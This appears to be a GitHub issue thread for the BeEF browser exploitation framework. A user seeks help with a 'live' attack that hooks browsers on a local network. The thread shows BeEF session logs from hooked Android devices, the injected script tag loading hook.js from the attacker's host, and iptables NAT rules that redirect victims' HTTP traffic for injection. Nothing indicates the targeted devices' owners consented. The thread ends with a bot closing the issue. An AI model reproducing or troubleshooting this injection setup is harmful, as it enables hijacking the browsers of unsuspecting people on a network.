/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:53][>] {"lastseen":"1692573593","count":100,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:54][>] {"lastseen":"1692573594","count":101,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:55][>] {"lastseen":"1692573595","count":102,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/*","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:56][>]

  1. Retrieve browser logs from your browser's developer console (Ctrl + Shift + I or F12 depending on browser)
  2. Retrieve your server-side logs from ~/.beef/beef.log
    • If using beef-xss logs found with journalctl -u beef-xss

journalctl -u beef-xss
-- No entries --

Memo: This is the Java Script code I am injecting into http web pages.
Beef.js

<script src="http://192.168.1.5:3000/hook.js"></script>

This method didn't cause me problems in the past.

Iptables rules

sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere anywhere multiport dports ftp,ssh,telnet

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

sudo iptables -L -t nat
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere anywhere tcp dpt:http to:192.168.1.5:8080

Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination

The script is supposedly being injected and I am kind of having issues with other scripts being injected I also had some
issues with my samsung galaxy tab a7 lite but not my other older motorola phone.

what seems to be the problem

I did manage to hook the browser the second time around only on the admin page 192.168.1.1 this is on a 5Ghz network Spectrum Router 5260

so that means maybe traffic flow isn't reaching me correctly right if the hook is injecting that means the signal back may be an issue?

I did manage to screen capture an all white blank page on the phone as you can see within debug output lol someone please help me diagnose and fix this issue

If we request additional information and we don't hear back from you within a week, we will be closing the ticket off.

@ChillVibesMushroom
Copy link
Author

I tried to give as much detail regarding Beef-XSS as possible while in production so this is a live output of the attack going on right before this I'll try with other devices here in a bit in order to get you a diagnosis of the output when targeting different models

@ChillVibesMushroom
Copy link
Author

Im having the same issue with every android device device awkward

@ChillVibesMushroom
Copy link
Author

beefrunningproperly
CentosPage
connectingcorrectly
nmapscan
scriptinpage

@ChillVibesMushroom
Copy link
Author

The issue may be here where apache2 is auto loaded on beef execution

Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)

    web_server_imitation:
        enable: true
        type: "apache" # Supported: apache, iis, nginx
        hook_404: false # inject BeEF hook in HTTP 404 responses
        hook_root: false # inject BeEF hook in the server home page

@github-actions
Copy link
Contributor

This issue as been marked as stale due to inactivity and will be closed in 7 days

@github-actions github-actions bot added the Stale Used to mark issues with inactivity label Aug 28, 2023
@github-actions github-actions bot closed this as completed Sep 4, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Stale Used to mark issues with inactivity
Projects
None yet
Development

No branches or pull requests

1 participant